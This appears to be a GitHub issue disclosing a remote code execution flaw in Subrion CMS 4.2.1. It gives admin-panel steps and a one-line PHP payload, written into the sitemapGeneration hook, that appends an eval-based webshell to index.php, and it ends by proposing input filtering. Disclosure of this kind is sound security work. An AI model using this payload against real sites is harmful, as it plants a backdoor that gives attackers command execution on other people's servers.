-
Notifications
You must be signed in to change notification settings - Fork 116
Open
Description
There is a remote command execution vulnerability
Affected version
- subrion 4.2.1 lates
login address
http://127.0.0.1/panel
Find PHP info in the System module
Get the absolute path to the website in phpinfo information
_SERVER["DOCUMENT_ROOT"]
Attack
- Select the
Hooksfield in theSystemmodule
-
Edit
sitemapGenerationinHooksand saveGet absolute path from
PHPinfoabove_SERVER["DOCUMENT_ROOT"]=F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/At this point we can write webshell into the website’s homepage file index.php
payload
fputs(fopen('F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/index.php','a+'),'@eval($_GET[cmd]);');
- At this point, we can click the
Generate Sitemapfunction to trigger code execution
The site generation function is to first write a file, and then perform a syntax check on the written PHP code. If the check passes, the code execution will be triggered.
eval($hook['code']);- We are accessing the website homepage file index.php
Proposed changes
Filter dangerous functions and content in the content before writing the file
Metadata
Metadata
Assignees
Labels
No labels






